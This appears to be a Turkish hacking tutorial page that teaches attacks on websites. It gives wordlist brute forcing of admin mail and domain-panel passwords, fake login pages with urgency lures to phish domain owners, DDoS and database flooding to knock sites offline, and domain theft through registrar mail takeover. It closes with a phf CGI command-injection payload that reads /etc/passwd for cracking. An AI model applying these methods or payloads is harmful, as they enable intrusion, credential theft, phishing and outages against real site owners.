Hack kütüphanesi..
WEB Hack
X |
Web Hack T.C. ilgili kanunları (TCK;245-135/I,II-134-107)belirtilmiştir.
[http://hackdefance.tr.gg/Web-Hack-Korunma.htm ] |
Web hack yöntemleri sırası ile şunlardır:
- Domaini hack etmek
- Host u hack etmek
- Ddos saldırısı ile siteyi yayından çıkartmak
- Flood saldırısı ile hack
- index yoluyla Web hack
- Domain çalma
- Sitenin db sini bulma yoluyla Web hack
Şimdilik aklıma gelenler bu kadar şimdi açıklamaya çalışalım....
DOMAİNİ HACK ETMEK:
Bu hack yöntemi genelde 2 şekilde yapılmaktadır. Administarator mail hack, Domain şifresini hack etmek iki şekildedir.. Şimdi bu iki şeyi sırası ile açıklayalım..
- Administrator mail hack : Bu siteye whois çekerek admin in mailini öğrenip hack etmektir.Bu töntemde iki şekilde olabilir
-- Brute force tekniği kullanarak yapılabilir: Eğer whois de adminin mailini bulduysak kendimize bir wordlist hazırlayıp bir brute force il deneme yanılma yöntemini kullanarak yapılmaktadır..Bunu wordlist marker la yapabilirsiniz.Mesela şu da olabilir.Adminin belli bi yazşta olduğu düşünülürse onun 15 yaşından başlayıp diyelimdi 40 yaşına kadar olan tarihleri yazmak yolu ilede bi wordlist oluştura bilirsiniz..Bide şu yöntemi uygulayın Admin hakkında bildiğiniz ne varsa bir .txt dosyasına kelime kelime dökün belki şansınız tutar..
-- Admine fake yiyecek kadar salaksa ona bi fake hazırlayabilirsiniz. Ya domaini aldığı firmanın üye girişi olarak yada başka bi yolla fake yapabilirsiniz..
- Domain şifresi çalma: Gine bundada iki yöntem uygulayacağız.
-- Deneme-yanılma yöntemi: Username bilinmiyorsa %90 <http://www.xxxxxxxx.com/> username xxxxxxxxxcom olmakta. Veyahut Paneldende bulabilirsiniz. Çoğu firmada geçersiz username diye belirtmektedir... Brute de hızlı sonuca ulaşmak istiyorsaniz karşı tarafın bilgilerini kelimelere döküp bir porg. vasıtasıyla wordlist oluşturabilirsiniz. Örn. Antalyadaki bir Web sitesi için. 07, antalya, web sitenin ismi, adminin adı, soyadı, tr, domainin sesli harfleri, sessiz harfleri, gibi kelimelerden yapılan güzel bir karma olasılığı yükseltir... En kötü ihtimal Brute Force gibi seçenekle tüm karakterleri denettirebilirsiniz
-- Son yöntem deneme-yanılma yöntemiyle bulamadıysanız eğer teknik bir yol olan domain şirketinin db sine ulaşmaktır..Eğr bununlada uğraşmak istiyorsanız Domain Panelinin birebir fake ini hazırlayabilirsiniz. İnandırıcı olması içinde whois bilgilerinden yararlanıp son update tarihine bakarak şu süredir sitenize on-line olmamaktasınız, en kısa sürede on-line olmalısınız gibi ibareler kullanabilirsiniz. Normalde Mail hackte kullanılan fake domain veya host hacklerde profesyonelce yapıldıktan sonra daha yüksek oranlı sonuçlar alınabilmektedir..
HOST U HACK ETMEK:
İlk önce sistemin nasıl çalıştığını öğrenmek gerekmektedir. Bunu bir N-stealth programıyla yapabiliriz yada prot scan fark etmez.Sistemin çalışma şekli karşımıza zaten iki şekilde gelecektir. Bunlardan birisi windows diğeri ise linux tur..
1.Windows: İSS 4.0 yada bunun altı bir sunucu ise msdac.dll açığı vardır sistemde.O zaman bir perl ile whisker explotini derleyip çalıştırın sonuca ulaşacaksınız.Eğer İSS 4.0 üstünde bir sunucu ise o zaman uni code adlı açığı bulmamız gerekecek.Bu açığı bulmak için her zamanki gibi N-stealh adlı programımızla arayacağız eğer bu açığı bulabilirsek siteyi hackleyebiliriz.Bulamayız fakat risk seviyesi yüksek bir açık bulabilirsek bunun exploit linkini program otomatikmen verecektir o zaman o zaman exploiti derleyerek sonuca ulaşmamız mümkün.Eğer risk seviyesi yüksek bir açık bulamazsak Gine brute force yöntemine kalmış oluruz.Domain hack bölümünde olduğu gibi bir wordl list oluşturarak hack lemeye bakarız eğer başarılı olursak hedefe ulaşırız..
2.Linux: (Bu bölümde bazı yerler alıntıdır) Eğer linux ise gine eski bir yöntem olan /ETC (açıklama bir: aşşağıda kırmızı yazı ile yazılmıştır) açığına bir bakın eğer varsa içinde mutlaka password.bak dosyası vardır bunu alın ve bir şifre kır ıcı ile kırın adını şu anda hatırlayamıyorum.Eğer kıramazsanız sistemde bir phf açığı varmı bir bakın eğer varsa cgi/phf?qalias yollarından biriyle sisteme girmeye çalışın eğer giremediyseniz brute force yöntemini kullanın..Buda olmadıysa gine sistemi bir N-stealth programıyla taratın eğer risk seviyesi yüksek bir açık bulursanız exploti ile sisteme girebilirsiniz.Giremezseniz gine yolumuz Brute forceye düşer.
DDOS YÖNTEMİ:
Ddos un amacı sitenin yayınına engel olmaktır. Başarı oranı cok yüksektir. Bunun en etkili olduğu siteler veritabanı kullanan sitelerdir. Eğer site ASP ise MDB , PHP ise MYSQL veritabının kullanır. Örnek olarak ANTİRUSU u verelim. Veritabanı kullanan sitelerin hepsi bir kullanıcı siteye girdiğindi bir session başlatır. AntiRus ta aynı siteye her saniye 1 kullanıcı sokarak veritabanının sessionlarında karmaşaya yol acar ve site sapıtır.
FLOOD YÖNTEMİ:
Veritabanı kullanan sitelerin veritabanını doldururak bozulmasına ve sitenin çalışmamasına yol açar .Örneğin DENYO ile bir foruma devamlı üye yaparak veritabanının bozulmasına yol açarsınız
İNDEX YOLUYLA WEB HACK:
En etkili ve en zor yöntemlerden biridir. Benim şu an için aklıma gelen yollardan biri sitenin kodları ile uğraşıp siteyi başka bir yere yönlendirerek yapılanlar veya direk sitenin barındığı sunucudaki açıklar ile index atmak mümkündür. (Listpath atmak ta sunucu açıkları altanda ilerde anlatılacaktır).
DOMAİN ÇALMA:
Domain ele geçiremek için tek yapmanız gereken siteye whois cekerek registarar (kaydeden) mailini ele geçirip başka bir sunucuya transfer edersiniz ve domaini üzerinize geçirirsiniz.
DB BULMA:
Eğer site asp ise bunun üç yolu varma 3. yolu aklıma gelmiyor.
1. /db/main.mdb
2. /db/clubportal.mdb
3. .........
Site hakkında bazı önemli bilgilere ulaşmak için
1) WHOIS
Domaini kaydeden kişinin mailini ve domainin o anda hangi nameserverda olduğun öğrenmek için ;
<http://www.evrensel.com/domainkaydet/whois/mwhois.php> ;
2) SİSTEM
domainin barındığı sunucudaki işletim sistemini öğrenmek için ;
<http://www.netcraft.com>
3)DNS
domain hakkındaki işinize yaracak bi takım bilgiler için ;
<http://www.dnsreport.com>
4)PİNG
domainin bulunduğu sunucunun ip si için ;
dos ortamından ping www.hedefsite.com <http://www.hedefsite.com>
ADRESLERİNİ KULLANABİLİRSİNİZ.
Bu yazıda daha basit ama daha hızlı bir hack yöntemini anlatacağım
Bu yöntem çok hoşunuza gidecek
Gerekli Programlar : Internet Explorer
haricinde bir web browser, Cracker Jack ve tabiki Meliksah Ozoral's Dict Maker.
--------------------------------------
Mantık : phf sistemlerde bulunan bir açıktır ve bu acık sayesinde sisteme
web uzerinden baglanip shellde bazi komutlari calistirabilirsiniz...
Not : Calistirdiginiz komutlar cd, ls, cat gibi komutlar silme islemlerini
phf uzerinden yapamiyorsunuz...
--------------------------------------
Ozellikler : phf sayesinde her hangi bir serverdan elinizde acc olmadan
passwd dosyasini alabilir ve kirabilirsiniz...Bu olay web uzerinden
olur ve hizli olur
--------------------------------------
Kullanim : phf nin kullanimi basitdir, sizi fazla zorlamaz. browsera girdiginiz adresin sonu asagidaki
satiri yazarsaniz "passwd" dosyasini browser penceresinde gorursunuz...
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Bu satirin mantigi sudur...
Asagidaki satir phf olayini acar.../cgi-bin/phf?Qalias=x%0a
Bu satirdan sonra yazacaginiz komutlarsistem uzerinde calistirilir...
ornegin :
cat%20/etc/passwd
etc dizinin altindaki passwd dosyasini goruntuler burda %20 bosluk oldugunu
belirtir yani :/cgi-bin/phf?Qalias=x%0als yazarsaniz bulundugunuz dizindeki dosyalar
goruntulenir.../cgi-bin/phf?Qalias=x%0als%20pass*
yazarsaniz bulundugunuz dizinde pass ile baslayan butun dosyalari listeler...